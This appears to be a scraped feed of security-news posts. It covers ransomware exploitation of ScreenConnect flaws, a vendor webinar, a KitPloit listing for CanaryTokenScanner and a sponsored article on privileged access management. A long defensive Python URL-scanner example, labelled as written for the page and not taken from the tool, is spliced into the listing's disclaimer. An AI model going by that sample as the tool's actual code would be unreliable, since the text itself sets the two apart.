National Crime Agency (NCA) last week.</p> <p>According to a <a href="https://www.scmagazine.com/news/exclusive-cyberattack-on-change-healthcare-was-an-exploit-of-the-connectwise-flaw" rel="nofollow" target="_blank">report</a> from SC Magazine, threat actors breached Optum's network by leveraging the <a href="https://thehackernews.com/2024/02/critical-flaws-found-in-connectwise.html" rel="nofollow" target="_blank">recently disclosed critical security flaws</a> in ConnectWise's ScreenConnect remote desktop and access software.</p> <p>The flaws, which allow for remote code execution on susceptible systems, have also been <a href="https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html" rel="nofollow" target="_blank">weaponized</a> by the <a href="https://thehackernews.com/2024/01/free-decryptor-released-for-black-basta.html" rel="nofollow" target="_blank">Black Basta</a> and <a href="https://thehackernews.com/2023/05/bl00dy-ransomware-gang-strikes.html" rel="nofollow" target="_blank">Bl00dy</a> ransomware gangs as well as by other threat actors to deliver <a href="https://thehackernews.com/2023/04/microsoft-takes-legal-action-to-disrupt.html" rel="nofollow" target="_blank">Cobalt Strike Beacons</a>, <a href="https://thehackernews.com/2023/08/new-attack-alert-freezers-injector.html" rel="nofollow" target="_blank">XWorm</a>, and even other remote management tools like Atera, Syncro, and another ScreenConnect client.</p> <p>Attack surface management firm Censys said it observed more than 3,400 exposed potentially vulnerable ScreenConnect hosts online, with most of them located in the U.S., Canada, the U.K., Australia, Germany, France, India, the Netherlands, Turkey, and Ireland.</p> <div class="separator" style="clear: both;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_fPupicSF6e1yyaH_c-VPgbxtSRvPc5bgcOY9jRkm7gKoL8qtC6raN6b1hyphenhyphenkMe3rlWZlKIPCMZuLHslMVDBm6QE9rUgVgcfwZ9ncaxAjbx0VUmcURPmccMLx18gxNzNnaOIR1mcFNjv_9gLpZKoNINLF6HpQzg9-boTGet736XCra8EsViRTVIXqDYpvq/s728-rw-e365/trends.png" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="BlackCat Ransomware" border="0" data-original-height="590" data-original-width="1044" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_fPupicSF6e1yyaH_c-VPgbxtSRvPc5bgcOY9jRkm7gKoL8qtC6raN6b1hyphenhyphenkMe3rlWZlKIPCMZuLHslMVDBm6QE9rUgVgcfwZ9ncaxAjbx0VUmcURPmccMLx18gxNzNnaOIR1mcFNjv_9gLpZKoNINLF6HpQzg9-boTGet736XCra8EsViRTVIXqDYpvq/s728-rw-e365/trends.png" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="BlackCat Ransomware"/></a></div> <p>"It's clear that remote access software like ScreenConnect continues to be a prime target for threat actors," Censys security researcher Himaja Motheram <a href="https://censys.com/connectwise-screenconnect-cve-2024-1709-cve-2024-1708/" rel="nofollow" target="_blank">said</a>.</p> <p>The findings come as ransomware groups like <a href="https://thehackernews.com/2023/11/8base-group-deploying-new-phobos.html" rel="nofollow" target="_blank">RansomHouse</a>, <a href="https://thehackernews.com/2024/02/rhysida-ransomware-cracked-free.html" rel="nofollow" target="_blank">Rhysida</a>, and a Phobos variant called <a href="https://dnsc.ro/citeste/alert-backmydata-ransomware-spitale-romania" rel="nofollow" target="_blank">Backmydata</a> have continued to <a href="https://www.esentire.com/blog/rhysida-ransomware-group-turns-its-wrath-warns-esentire" rel="nofollow" target="_blank">compromise</a> various organizations in the U.S., U.K., Europe, and the Middle East. 
</p> <p>In a sign that these cybercrime groups are shifting to more nuanced and sophisticated tactics, RansomHouse has developed a custom tool dubbed MrAgent to deploy the file-encrypting malware at scale.</p> <div class="check_two clear bobbob"><center class="cf"><a href="https://thehackernews.uk/tcepdHrZ" rel="nofollow" target="_blank" title="Cybersecurity"><img alt="Cybersecurity" class="lazyload" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVhi7qr5Hen_9AjDa2uZMIW8b9hxydG5MpgkcamW6lADBts-QzcbwiMscCUSJ5ScLmTIt97I9Y7L3kFbXLlkt40DwhkyCLl3QrLwjViEZrbgNuTHnIjYcFmf8OHFIdfXzIxCoCJYxj8rokzFuM9fAuUhoKus7KPsedxq4k7CY9_-iZ3dtVRdB1DtqvdRIf/s728-rw-e365/cis-728.png" height="90" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" width="727"/></a></center></div> <p>"MrAgent is a binary designed to run on [VMware ESXi] hypervisors, with the sole purpose of automating and tracking the deployment of ransomware across large environments with a high number of hypervisor systems," Trellix <a href="https://www.trellix.com/blogs/research/ransomhouse-am-see/" rel="nofollow" target="_blank">said</a>. 
Details of MrAgent <a href="https://twitter.com/malwrhunterteam/status/1704972339790655736" rel="nofollow" target="_blank">first came to light</a> in September 2023.</p> <p>Another significant tactic adopted by some ransomware groups is the sale of direct network access as a new monetization method via their own blogs, on Telegram channels, or data leak websites, KELA <a href="https://www.kelacyber.com/more-than-data-ransomware-groups-are-now-selling-network-access-directly/" rel="nofollow" target="_blank">said</a>.</p> <p>It also follows the public release of a Linux-specific, C-based ransomware threat known as Kryptina, which surfaced in December 2023 on underground forums and has since been made available for free on BreachForums by its creator.</p> <div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxNrxQKJYxQgRhMNc6MvMCtQBeDhdU5OwKu_APE2AUBxx_QdvzeFjBxUtHsINDY9-m8j49Egva2VcJqvLfQlq2O8X5lxHfGhsYxGYj0lH1ZocjnYL_Ps_QKbA1nB_Lfd_P1Vaxs3CRovCJYM8iH9T1T74-L7F8wsoSz6_elFdYEaKs5UW1Vt5cbJvMq9e5/s728-rw-e365/Kryptina.png" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="BlackCat Ransomware" border="0" data-original-height="525" data-original-width="991" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxNrxQKJYxQgRhMNc6MvMCtQBeDhdU5OwKu_APE2AUBxx_QdvzeFjBxUtHsINDY9-m8j49Egva2VcJqvLfQlq2O8X5lxHfGhsYxGYj0lH1ZocjnYL_Ps_QKbA1nB_Lfd_P1Vaxs3CRovCJYM8iH9T1T74-L7F8wsoSz6_elFdYEaKs5UW1Vt5cbJvMq9e5/s728-rw-e365/Kryptina.png" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="BlackCat Ransomware"/></a></div> <p>"The release of the RaaS source code, complete with extensive documentation, could have significant implications for the spread and impact of ransomware attacks against Linux systems," SentinelOne researcher Jim Walter <a 
href="https://www.sentinelone.com/blog/kryptina-raas-from-underground-commodity-to-open-source-threat/" rel="nofollow" target="_blank">said</a>.</p> <p>"It is likely to increase the ransomware builder's attractiveness and usability, drawing in yet more low-skilled participants to the cybercrime ecosystem. There is also significant risk that it will lead to the development of multiple spin-offs and an increase in attacks."</p> <br/> <div class="cf note-b">Found this article interesting? Follow us on <a href="https://twitter.com/thehackersnews" rel="nofollow" target="_blank">Twitter <i class="icon-font icon-twitter"></i></a> and <a href="https://www.linkedin.com/company/thehackernews/" rel="nofollow" target="_blank">LinkedIn</a> to read more exclusive content we post.</div> </div><br/><b>Source:</b> <a href="https://thehackernews.com/2024/02/fbi-warns-us-healthcare-sector-of.html" rel="nofollow" target="_blank">thehackernews.com</a>
tag:blogger.com,1999:blog-4759513439688665544.post-8599748525618776331
2024-02-28T04:31:00.001-08:00
2024-02-28T04:31:18.337-08:00
Building Your Privacy-Compliant Customer Data Platform (CDP) With First-Party Data
<div class="articlebody clear cf" id="articlebody"><div class="separator" style="clear: both;"><a
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjekU7XcahU23ovu_89Z9cqz7mylVDYXpNb6ttWBfXYjfRXEcR7-4NaC8Hp3-azQKttgbliMyHLqrzcn4pSvUzLfujDSArgoN8ek1djzIEGT8Z_9KKt5z78U39bbSGaSTrZ4X7rYCi_9rXowrT9VwTRZ0axA90KZb44Py-0rVCMBAkOmkyAeXESdg7-sC3V/s728-rw-e30/tt.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="Privacy-Compliant Customer Data Platform (CDP)" border="0" data-original-height="380" data-original-width="728" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjekU7XcahU23ovu_89Z9cqz7mylVDYXpNb6ttWBfXYjfRXEcR7-4NaC8Hp3-azQKttgbliMyHLqrzcn4pSvUzLfujDSArgoN8ek1djzIEGT8Z_9KKt5z78U39bbSGaSTrZ4X7rYCi_9rXowrT9VwTRZ0axA90KZb44Py-0rVCMBAkOmkyAeXESdg7-sC3V/s728-rw-e365/tt.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Privacy-Compliant Customer Data Platform (CDP)"/></a></div> <p>In today's digital era, data privacy isn't just a concern; it's a consumer demand. Businesses are grappling with the dual challenge of leveraging customer data for personalized experiences while navigating a maze of privacy regulations. The answer? A privacy-compliant Customer Data Platform (CDP).</p><a name='more'></a> <p><a href="https://thehacker.news/customer-data-platform?source=article" rel="nofollow" target="_blank">Join us for a transformative webinar</a> where we unveil Twilio Segment's state-of-the-art CDP. 
Discover how it champions compliant and consented data use, empowering you to craft a holistic customer view and revolutionize engagement strategies.</p> <h3 style="text-align: left;"><span style="font-size: 18.72px;">What Will You Learn?</span></h3> <ul> <li>Strategies for ethically democratizing data across your organization.</li> <li>The power of first-party data in unlocking profound customer insights.</li> <li>The pivotal role of a CDP in fostering compliant and consented data utilization.</li> <li>Proven customer engagement methodologies from industry leaders.</li> </ul> <h3 style="text-align: left;"><span style="font-size: 18.72px;">Why Should You Attend?</span></h3> <p>Twilio Segment's State of Personalization Report reveals a compelling truth: 63% of consumers welcome personalization, provided it stems from directly shared data.</p> <p>However, the phasing out of third-party cookies, the advent of privacy-centric browsers, and stringent regulations like GDPR have left businesses pondering how to personalize effectively within a privacy-first framework.</p> <h3 style="text-align: left;"><span style="font-size: 18.72px;">Don't Miss Out!</span></h3> <p>In an age where data privacy and compliance are not just buzzwords but imperatives, mastering the ethical management of customer data is crucial for businesses striving for excellence.</p> <style> .webi-a-box{ background-color: #f6f7fd; padding: 25px; border-radius: 10px; } .webi-a-box h2 { color: #333; margin-top: 0; } .webi-a-box .cta-button { display: inline-block; margin-top: 20px; padding: 10px 20px; background-color: #4469f5; color: #ffffff !important; border-radius: 5px; text-decoration: none; transition: background-color 0.3s ease; } </style> <div class="webi-a-box"><div>Ensure you're part of the conversation on building a privacy-compliant CDP with first-party data</div><a class="cta-button" href="https://thehacker.news/customer-data-platform?source=article" rel="nofollow">Reserve Your Webinar Spot 
➜</a></div> <p>Circle your calendar for "<a href="https://thehacker.news/customer-data-platform?source=article" rel="nofollow" target="_blank">Building Your Privacy-Compliant Customer Data Platform (CDP) with First-Party Data</a>." Secure your spot now for an enlightening session you can't afford to miss!</p> <br/> <div class="cf note-b"><span class="">This article is a contributed piece from one of our valued partners.</span></div> </div><br/><b>Source:</b> <a href="https://thehackernews.com/2024/02/building-your-privacy-compliant.html" rel="nofollow" target="_blank">thehackernews.com</a>
tag:blogger.com,1999:blog-4759513439688665544.post-1076493199546099685
2024-02-28T03:55:00.001-08:00
2024-02-28T03:55:20.606-08:00
CanaryTokenScanner - Script Designed To Proactively Identify Canary Tokens Within Microsoft Office Documents And Acrobat Reader PDF (Docx, Xlsx, Pptx, Pdf)
<div class="post-body entry-content" id="post-body-1164925407770700622" itemprop="articleBody"> <div style="margin:15px"> </div> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgwVXueB5F2b67Yyrfb_cROA2YmSiABp_GfA29nu62xPpn6hQz3DKfCKTb_GDjKZ6RNmBQF1Bv2hRbCODlOxt6r48okD8RUYr2XgFFS3a3bckQVfOjCQpX5Mqr52N3Cofk-ViPoqgf1SZ5PI6aUM-fFVvaHnWf5q9rXcTwmbmhVFNRGyFfinbcUC_gs4_AG" rel="nofollow"><img alt="" border="0" height="122" id="BLOGGER_PHOTO_ID_7337930840565836562"
src="https://blogger.googleusercontent.com/img/a/AVvXsEgwVXueB5F2b67Yyrfb_cROA2YmSiABp_GfA29nu62xPpn6hQz3DKfCKTb_GDjKZ6RNmBQF1Bv2hRbCODlOxt6r48okD8RUYr2XgFFS3a3bckQVfOjCQpX5Mqr52N3Cofk-ViPoqgf1SZ5PI6aUM-fFVvaHnWf5q9rXcTwmbmhVFNRGyFfinbcUC_gs4_AG=w640-h122" width="640"/></a></p><span style="font-size: large;"><b>Detecting Canary Tokens and Suspicious URLs in <a href="https://www.kitploit.com/search/label/Microsoft" rel="nofollow" target="_blank" title="Microsoft">Microsoft</a> Office, Acrobat Reader PDF and Zip Files</b></span><br/> <br/><b>Introduction</b><br/> <p>In the dynamic realm of cybersecurity, vigilance and proactive <a href="https://www.kitploit.com/search/label/Defense" rel="nofollow" target="_blank" title="defense">defense</a> are key. Malicious actors often leverage Microsoft Office files and Zip archives, embedding covert URLs or macros to initiate harmful actions. This Python script is crafted to detect potential threats by scrutinizing the contents of Microsoft Office documents, Acrobat Reader PDF documents and Zip files, reducing the risk of inadvertently triggering malicious code.</p> <b>Understanding the Script</b><br/> <br/><b>Identification</b><br/> <p>The script identifies Microsoft Office documents (.docx, .xlsx, .pptx), Acrobat Reader PDF documents (.pdf) and Zip files. Office documents and Zip files are both zip archives, so their contents can be examined programmatically.</p> <br/><b>Decompression and Scanning</b><br/> <p>For both Office and Zip files, the script decompresses the contents into a temporary directory. It then scans these contents for URLs using regular expressions, searching for potential signs of compromise.</p> <br/><b>Ignoring Certain URLs</b><br/> <p>To minimize false positives, the script includes a list of domains to ignore, filtering out common URLs typically found in Office documents. 
This ensures focused <a href="https://www.kitploit.com/search/label/Analysis" rel="nofollow" target="_blank" title="analysis">analysis</a> on unusual or potentially harmful URLs.</p> <br/><b>Flagging Suspicious Files</b><br/> <p>Files with URLs not on the ignored list are marked as suspicious. This heuristic method allows for adaptability based on your specific security context and threat landscape.</p> <br/><b>Cleanup and Restoration</b><br/> <p>Post-scanning, the script cleans up by erasing temporary decompressed files, leaving no traces.</p> <br/><b>Usage</b><br/> <p>To use the script:</p> <ol> <li><strong>Setup</strong> <ol> <li>Ensure Python is installed on your system.</li> <li>Place the script in an accessible location.</li> <li>Execute the script with the command: <code>python CanaryTokenScanner.py FILE_OR_DIRECTORY_PATH</code> (replace <code>FILE_OR_DIRECTORY_PATH</code> with the actual file or <a href="https://www.kitploit.com/search/label/Directory" rel="nofollow" target="_blank" title="directory">directory</a> path).</li> </ol> </li> <li><strong>Interpretation</strong> <ol> <li>Examine the output. Remember, this script is a starting point; flagged documents might not be harmful, and not all malicious documents will be flagged. Manual examination and additional security measures are advisable.</li> </ol> </li> </ol> <br/><b>Script Showcase</b><br/> <p style="text-align: center;"><em>An example of the Canary Token Scanner script in action, demonstrating its capability to detect suspicious URLs.</em></p> <br/><b>Disclaimer</b><br/> <p>This script is intended for educational and security testing purposes only. 
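</p>
<p>The identification, decompression, URL-scan, ignore-list, flagging and cleanup steps described above, worked through as an added Python example (illustration code written for this page, not the CanaryTokenScanner script itself). The ignore list, the 50 MiB inflation limit, the <code>.invalid</code> hosts and the minimal <code>.docx</code> and PDF byte strings are all constructed for the demonstration:</p>

```python
import io
import os
import re
import sys
import tempfile
import zipfile
from urllib.parse import urlparse

# Constructed ignore list: hosts that appear in nearly every Office package
# (schema namespaces, relationship types). Tune it to your own environment.
IGNORED_DOMAINS = {
    "schemas.openxmlformats.org",
    "schemas.microsoft.com",
    "purl.org",
    "www.w3.org",
}
ARCHIVE_EXTENSIONS = {".docx", ".xlsx", ".pptx", ".zip"}
# Assumed safety limit: refuse to inflate archives above this size (zip-bomb guard).
MAX_INFLATED_BYTES = 50 * 1024 * 1024
URL_RE = re.compile(rb"""https?://[^\s"'<>()\[\]]+""")


def domain_is_ignored(url: str) -> bool:
    """True when the URL's host is, or is a subdomain of, an ignored domain."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in IGNORED_DOMAINS)


def urls_in_bytes(data: bytes) -> set[str]:
    """Every http(s) URL found in raw bytes, trailing punctuation stripped."""
    return {m.group(0).decode("utf-8", "replace").rstrip(".,;") for m in URL_RE.finditer(data)}


def suspicious_urls_in_archive(data: bytes) -> list[str]:
    """Inflate a zip-based document into a temp dir, scan every member, drop ignored hosts."""
    found: set[str] = set()
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        inflated = sum(info.file_size for info in zf.infolist())
        if inflated > MAX_INFLATED_BYTES:
            raise ValueError(f"archive inflates to {inflated} bytes; refusing to extract")
        # TemporaryDirectory deletes everything on exit, which is the cleanup step.
        with tempfile.TemporaryDirectory() as tmp:
            zf.extractall(tmp)  # ZipFile strips '..' and absolute paths from member names
            for root, _dirs, files in os.walk(tmp):
                for name in files:
                    with open(os.path.join(root, name), "rb") as fh:
                        found |= urls_in_bytes(fh.read())
    return sorted(u for u in found if not domain_is_ignored(u))


def suspicious_urls_in_pdf(data: bytes) -> list[str]:
    """PDFs are not zip archives: scan the raw bytes. URLs inside compressed
    (FlateDecode) streams are invisible to this simple pass."""
    return sorted(u for u in urls_in_bytes(data) if not domain_is_ignored(u))


def scan_file(path: str) -> list[str]:
    """Dispatch on extension; an empty list means nothing was flagged."""
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as fh:
        data = fh.read()
    if ext in ARCHIVE_EXTENSIONS:
        return suspicious_urls_in_archive(data)
    if ext == ".pdf":
        return suspicious_urls_in_pdf(data)
    return []


def make_sample_docx() -> bytes:
    """Constructed minimal .docx: one external hyperlink to an unfamiliar host,
    plus the schema URLs that every Office package legitimately contains."""
    rels = (
        b'<?xml version="1.0" encoding="UTF-8"?>'
        b'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        b'<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" '
        b'Target="http://tracker.example.invalid/beacon/abc123" TargetMode="External"/>'
        b'</Relationships>'
    )
    document = (
        b'<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        b'<w:body><w:p><w:r><w:t>Quarterly report</w:t></w:r></w:p></w:body></w:document>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml", document)
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


def make_sample_pdf() -> bytes:
    """Constructed PDF fragment with an uncompressed link annotation."""
    return (b"%PDF-1.4\n1 0 obj\n<< /Type /Annot /Subtype /Link "
            b"/A << /S /URI /URI (https://cdn.example.invalid/t/9f2e) >> >>\nendobj\n%%EOF\n")


if __name__ == "__main__":
    targets = sys.argv[1:]
    if not targets:  # no path given: run on the constructed samples
        print("sample.docx ->", suspicious_urls_in_archive(make_sample_docx()))
        print("sample.pdf  ->", suspicious_urls_in_pdf(make_sample_pdf()))
    for target in targets:
        paths = [target] if os.path.isfile(target) else [
            os.path.join(r, f) for r, _d, fs in os.walk(target) for f in fs]
        for path in paths:
            flagged = scan_file(path)
            print(("SUSPICIOUS " if flagged else "clean      ") + path, *flagged)
```

<p>Run it with no arguments to scan the two constructed samples, or pass a file or directory path as the original script does. Two limits of this bare-bones approach are worth knowing before relying on it: the inflated-size check refuses archives that would expand past the limit (a zip bomb would otherwise fill the temporary directory), and the PDF pass only sees URLs in uncompressed objects, so a link annotation inside a FlateDecode stream needs the stream inflated first. Python's <code>ZipFile</code> already drops leading slashes and <code>..</code> components when extracting, so crafted member names cannot escape the temporary directory.</p>
<p>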
Utilize it responsibly and in <a href="https://www.kitploit.com/search/label/Compliance" rel="nofollow" target="_blank" title="compliance">compliance</a> with applicable laws and regulations.</p><br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/0xNslabs/CanaryTokenScanner" rel="nofollow" target="_blank" title="Download CanaryTokenScanner">Download CanaryTokenScanner</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/02/canarytokenscanner-script-designed-to.html" rel="nofollow" target="_blank">www.kitploit.com</a>
tag:blogger.com,1999:blog-4759513439688665544.post-2360489961961375160
2024-02-28T02:46:00.001-08:00
2024-02-28T02:46:26.994-08:00
Superusers Need Super Protection: How To Bridge Privileged Access Management And Identity Management
<div class="articlebody clear cf" id="articlebody"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb1Ev1Ia07h2BSBbjByAnMMa-ye3w5KcgJJybQq_ZYLBztiUKxx1JOn29C8EYqKV4JepekvUmD8U0ar8XnNrlenjBflT_abc82AtyV-NUH3Q3dztvBPqc5pMSeDygTAY3eae96pT-X_Msb1B5HWMmYZXD3KQQfis4ZatyFxYXRwej_z6sLnnB-qwqT4jE/s728-rw-e365/ssh.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="Privileged Access Management"
border="0" data-original-height="380" data-original-width="728" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb1Ev1Ia07h2BSBbjByAnMMa-ye3w5KcgJJybQq_ZYLBztiUKxx1JOn29C8EYqKV4JepekvUmD8U0ar8XnNrlenjBflT_abc82AtyV-NUH3Q3dztvBPqc5pMSeDygTAY3eae96pT-X_Msb1B5HWMmYZXD3KQQfis4ZatyFxYXRwej_z6sLnnB-qwqT4jE/s728-rw-e365/ssh.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Privileged Access Management"/></a></div> <p>Traditional perimeter-based security has become costly and ineffective. As a result, communications security between people, systems, and networks is more important than blocking access with firewalls.<strong> On top of that, most cybersecurity risks are caused by just a few superusers – typically one out of 200 users.</strong> There's a company aiming to fix the gap between traditional PAM and IdM solutions and secure your one out of 200 users – <a href="https://www.ssh.com/solutions/entra-id-and-privileged-access-management-with-zero-trust-suite?hsCtaTracking=998a35ae-4bc1-45f1-8ac5-ec89f0d01747%7C7b915d01-0094-4749-b1c3-7ac324cd68ba" rel="nofollow" target="_blank">SSH Communications Security.</a> </p><a name='more'></a> <p>Your Privileged Access Management (PAM) and Identity Management (IdM) should work hand in hand to secure your users' access and identities – regular users and privileged users alike. But traditional solutions struggle to achieve that. 
</p> <div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9byts1ABdyKsqkMU1K7py3V0VorYfbxm2aG4vLLHDIKMaWhOpKgg98uN0Vjp5QNKgA4jKK0jlGqct74xt1ZPfkxITYfx6WTicnS55P6RejFVbBp-1LWtmMTrx6Bq5qEfHQpUzusBFwYUN7_E4mohTaW-NqdpHQdPFsTm7WyQTRh8t9I-3T6v3TfLqfVY/s728-rw-e365/ssh-2.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="Privileged Access Management" border="0" data-original-height="1080" data-original-width="2083" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9byts1ABdyKsqkMU1K7py3V0VorYfbxm2aG4vLLHDIKMaWhOpKgg98uN0Vjp5QNKgA4jKK0jlGqct74xt1ZPfkxITYfx6WTicnS55P6RejFVbBp-1LWtmMTrx6Bq5qEfHQpUzusBFwYUN7_E4mohTaW-NqdpHQdPFsTm7WyQTRh8t9I-3T6v3TfLqfVY/s728-rw-e365/ssh-2.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Privileged Access Management"/></a></div> <p>Let's look at what organizations need to understand about PAM and IdM and how you can bridge and future-proof your PAM and IdM.</p> <h2 style="text-align: left;"><strong>PIM, PAM, IAM – you need all three of them</strong></h2> <p>Privileged Identity Management (PIM), Privileged Access Management (PAM), and Identity and Access Management (IAM) - all three are closely connected, and you need all three of them to effectively manage and secure your digital identities, users and access. 
</p> <p>Let's quickly review what PIM, PAM, and IAM focus on: </p> <ul style="text-align: left;"><li>PIM – management of root user identities and authorizations </li><li><a href="https://www.ssh.com/products/privileged-access-management-privx" rel="nofollow" target="_blank">PAM – management of root user access to critical resources and auditing</a> </li><li>IAM – management of basic user identities, authorizations, and access to resources</li></ul> <h2 style="text-align: left;"><strong>Not all digital identities are created equal – superusers need super protection </strong></h2> <p>Think about this: Your typical user probably needs access to regular office tools, like your CRM or M365. They don't need access to any of your critical assets. </p> <p>The identity verification process should correspond to this. A regular user needs to be verified with strong authentication methods, e.g. Microsoft Entra ID, but there's usually no need to go beyond that.</p> <p>These typical users form the majority of your users, up to 99.5% of them.</p> <p>On the other hand, you have your privileged high-impact users – there's only a small number of them (typically around one in 200 users), but the power and risks they carry are huge because they can access your critical data, databases, infrastructures, and networks. </p> <p>Similarly, appropriate identity verification procedures should apply. In the case of your high-impact users, <a href="https://www.ssh.com/solutions/entra-id-and-privileged-access-management-with-zero-trust-suite" rel="nofollow" target="_blank">you need access controls that go beyond strong identity-based authentication.</a></p> <h2 style="text-align: left;"><strong>Enter the Zero Trust - Borderless, Passwordless, Keyless and Biometric Future</strong></h2> <p>Traditional solutions are not enough to bridge your PAM and IdM. They just can't handle the security that you need to protect your critical assets. 
Nor can they offer effective and future-proof security controls for access and identities of your typical users as well as high-impact users. </p> <p>The future of cybersecurity is borderless, passwordless, keyless, <a href="https://www.ssh.com/passwordless-identity-and-privileged-access-management" rel="nofollow" target="_blank">biometric</a>, and Zero Trust. </p> <p>This means that you need a future-proof cybersecurity model with no implicitly trusted users, connections, applications, servers, or devices. On top of that, you need an additional layer of security with passwordless, keyless, and biometric authentication.</p> <p>Learn the importance of implementing the <a href="https://info.ssh.com/passwordless-keyless-white-paper?_gl=1*1yy2av*_gcl_au*MTA0OTA1NjI1MS4xNzA3ODE3Nzc4*_ga*MTk4NjEwMzExMS4xNjkyMjYxNDgy*_ga_6VT6K5D8NH*MTcwODkzNjc4Ni4zOTMuMS4xNzA4OTM5MDM4LjM0LjAuMA.." rel="nofollow" target="_blank">passwordless and keyless</a> approach into your cybersecurity from the whitepaper provided by SSH Communications Security.</p> <br/> <div class="cf note-b"><span class="">This article is a contributed piece from one of our valued partners.</span></div> </div><br/><b>Source:</b> <a href="https://thehackernews.com/2024/02/superusers-need-super-protection-how-to.html" rel="nofollow" target="_blank">thehackernews.com</a>